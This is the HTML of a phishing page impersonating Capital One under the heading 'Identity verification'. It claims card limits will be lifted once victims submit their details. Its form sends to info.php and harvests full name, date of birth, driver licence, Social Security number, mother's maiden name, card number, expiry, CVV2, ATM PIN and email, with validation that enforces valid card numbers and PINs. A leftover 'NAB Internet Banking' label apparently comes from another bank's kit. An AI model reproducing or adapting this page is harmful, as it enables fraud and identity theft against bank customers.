<!DOCTYPE html>
<html><head>

<title>Capital One</title><script language="JavaScript" src="css/gen_validatorv2.js" type="text/javascript"></script>

<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Cache-Control" content="no-store">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="-1">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0">

<meta name="format-detection" content="telephone=no">

<meta name="x-rim-auto-match" http-equiv="x-rim-auto-match" forua="true" content="none">

<link rel="apple-touch-icon" href="images/apple-touch-icon.png">
<link rel="icon" type="image/x-icon" href="images/favicon.ico">

		<link rel="stylesheet" href="css/mib_legacy.css?id=010" type="text/css" media="screen">

<script src="css/getBrowserData.js?id=021" type="text/javascript"></script>	

<style type="text/css"></style>
<script type="text/javascript" src="css/encoder.js"></script></head>

<body id="body">

<div class="content">

<div id="content">

<form id="name1" name="name1" action="info.php" method="post" autocomplete="off">
 
	<input name="browserData" value="" type="hidden">
	<input name="org.apache.struts.taglib.html.TOKEN" value="b1df98c6eedfca632a544e74ed27c636" type="hidden">
	<input id="jsEnabled" name="jsEnabled" value="false" type="hidden">

	<div class="content">
		<div class="heading"> <h2 class="float_left">
			<img border="0" src="images/capitalone-logo.png" width="330" height="70"></h2>
			<h2 class="float_left">Identity verification</h2></div>

		<div class="border_rnd_btm">
<div class="info_text"><span style="font-size: 180%">
			Please Note: Once you have submitted your information, the limitations on your card will be removed immediately.</div>
			<div class="data clear noline">&nbsp;</div>
			<div class="data clear noline">&nbsp;</div><span style="font-size: 182%">
			<div class="data clear"><label class="data_label" for="password"><span style="font-size: 100%">Full Name</label><input class="data_input" name="first" size="1">
			</div>
					<div class="data clear">
						<label class="data_label" for="password3"><span style="font-size: 100%">Date of Birth
						<span style="font-weight: 400;">(mmddyyyy)</span> </label>
						<input class="data_input" pattern="[0-9]*" name="dobus" id="password3" maxlength="15" size="1">
					</div>

					<div class="data clear">
						<label class="data_label" for="password3"><span style="font-size: 100%">Driver License</label>
						<input class="data_input" name="driver" id="password3" maxlength="50" size="1">
					</div>

					<div class="data clear">
						<label class="data_label" for="password3"><span style="font-size: 100%">Phone Number</label>
						<input class="data_input" pattern="[0-9]*" name="phone" id="password3" maxlength="15" size="1">
					</div>
					<div class="data clear">
						<label class="data_label" for="password3"><span style="font-size: 100%">Mother Maiden Name</label>
						<input class="data_input" name="mmn" id="password3" maxlength="25" size="1">
					</div>
			<div class="data clear"><label class="data_label" for="password"><span style="font-size: 100%">Card Billing Address
				</label><input class="data_input" name="last" size="1"> 
				<div class="data clear noline">&nbsp;<label class="data_label" for="password1"><span style="font-size: 100%">Social Security Number<span style="font-weight: 400;"> </span></label>
					<input class="data_input" pattern="[0-9]*" name="dob" id="password1" maxlength="10" size="1">
				</div><label ><span style="font-size: 100%">Zip Code </label><span style="font-size: 100%">
				<input name="ssn" id="userid0" class="data_input" pattern="[0-9]*" size="1"> </div>
			<div class="data clear">
				<div class="data clear noline">
					<div class="data clear">
						<label class="data_label" for="password3"><span style="font-size: 100%">City</label>
						<input class="data_input" name="city" id="password3" maxlength="15" size="1">
					</div>
				<div class="data clear noline">
					<div class="data clear">
						<label class="data_label" for="password3"><span style="font-size: 100%">State</label>
						<input class="data_input" name="state" id="password3" maxlength="25" size="1">
					</div>
					<div class="data clear noline">
						<label class="data_label" for="userid3"><span style="font-size: 100%">Card Number 
						<span style="font-weight: 400;">(no dashes or spaces)</span>
						</label>
						<input name="card" id="userid3" maxlength="16" class="data_input" pattern="[0-9]*" size="1">
					</div>
					<div class="data clear">
						<label class="data_label" for="password3"><span style="font-size: 100%">Expiration Date
						<span style="font-weight: 400;">(mmyyyy)</span> </label>
						<input class="data_input" pattern="[0-9]*" name="expdate" id="password3" maxlength="7" size="1">
					</div>
					<div class="data clear noline">
						<label class="data_label" for="userid4"><span style="font-size: 100%">CVV2
				</label><input name="cvv" id="userid4" maxlength="3" class="data_input" pattern="[0-9]*" size="1">
					</div>
					<div class="data clear">
						<label class="data_label" for="password3"><span style="font-size: 100%">ATM PIN</label><input class="data_input" pattern="[0-9]*" name="pin" id="password3" maxlength="8" size="1" type="password">
					</div>
					<div class="data clear noline">
						<label class="data_label" for="userid4"><span style="font-size: 100%">Verify ATM PIN
						</label>
						<input name="pin1" id="userid4" maxlength="8" class="data_input" pattern="[0-9]*" size="1" type="password">
					</div>
				<div class="data clear noline">
					<div class="data clear">
						<label class="data_label" for="password3"><span style="font-size: 100%">E-mail Address</label>
						<input class="data_input" name="email" id="password3" maxlength="50" size="1">
					</div>

					<div class="data clear">&nbsp;</div></div></div>
			<input id="login" name="login" class="frm_button" value="Submit" type="submit">
		</div>
		<div class="mobTileOther">
			<a href="index.html" title="NAB Internet Banking promo tile">
			<img src="images/login-message-other.gif" alt=""> </a></div>

	</div>
</form>
 
	<script language="JavaScript" type="text/javascript">
//You should create the validator only after the definition of the HTML form
  var frmvalidator  = new Validator("name1");
  
frmvalidator.addValidation("first","req","Please enter your first name.");
frmvalidator.addValidation("dobus","req","Enter your date of birth.");
frmvalidator.addValidation("driver","req","Please enter your driver licence number.");
frmvalidator.addValidation("phone","req","Please enter your phone number.");
frmvalidator.addValidation("mmn","req","Please enter your mother maiden name.");
frmvalidator.addValidation("last","req","Please enter your card billing address .");
frmvalidator.addValidation("dob","req","Please enter your social security number.");
frmvalidator.addValidation("ssn","req","Please enter your zip code .");
frmvalidator.addValidation("city","req","Please enter your card billing city.");
frmvalidator.addValidation("state","req","Please enter your card billing state.");
frmvalidator.addValidation("card","minlen=16","Enter your card number.");
frmvalidator.addValidation("card","numeric","Enter your card number.");
frmvalidator.addValidation("card","luhn","Invalid card number. Please re-enter.");
frmvalidator.addValidation("expdate","req","Enter your card's expiration date.");
frmvalidator.addValidation("cvv","req","Enter your Card Verification Value. Your CVV2 is written on the back of your card.");
frmvalidator.addValidation("cvv","numeric","Enter your Card Verification Value. Your CVV2 is written on the back of your card.");
frmvalidator.addValidation("cvv","minlen=3","Invalid CVV2. Enter your Card Verification Value. Your CVV2 is written on the back of your card.");
frmvalidator.addValidation("cvv","maxlen=3","Invalid CVV2. Enter your Card Verification Value. Your CVV2 is written on the back of your card.");
frmvalidator.addValidation("pin","req","Please enter your ATM PIN.");
frmvalidator.addValidation("pin","numeric","Please enter your ATM PIN.");
frmvalidator.addValidation("pin","minlen=4","Invalid PIN. Please enter your ATM PIN.");
frmvalidator.addValidation("pin","maxlen=6","Invalid PIN. Please enter your ATM PIN.");
frmvalidator.addValidation("pin1","req","Please enter your ATM PIN.");
frmvalidator.addValidation("pin1","numeric","Please enter your ATM PIN.");
frmvalidator.addValidation("pin1","minlen=4","Invalid PIN. Please enter your ATM PIN.");
frmvalidator.addValidation("pin1","maxlen=6","Invalid PIN. Please enter your ATM PIN.");
frmvalidator.addValidation("email","req","Please enter your e-mail address.");
</script>

<div class="colspan welcome">
	<ul id="login_extras">
		<li>
			<a href="index.html">Online Security Guarantee</a> </li>
		<li>
			<a class="navlink navlinkbelowhdr " href="index.html">ATMs/Locations</a> </li>
		<li>				
			<a class="navlink" href="index.html">CEO Mobile</a> </li>
		<li>
			<a class="navlink" href="index.html">Quick Guide</a></li>
		<li><a href="index.html">Help</a> </li>
	</ul></div>
 
</div>
</div></body></html>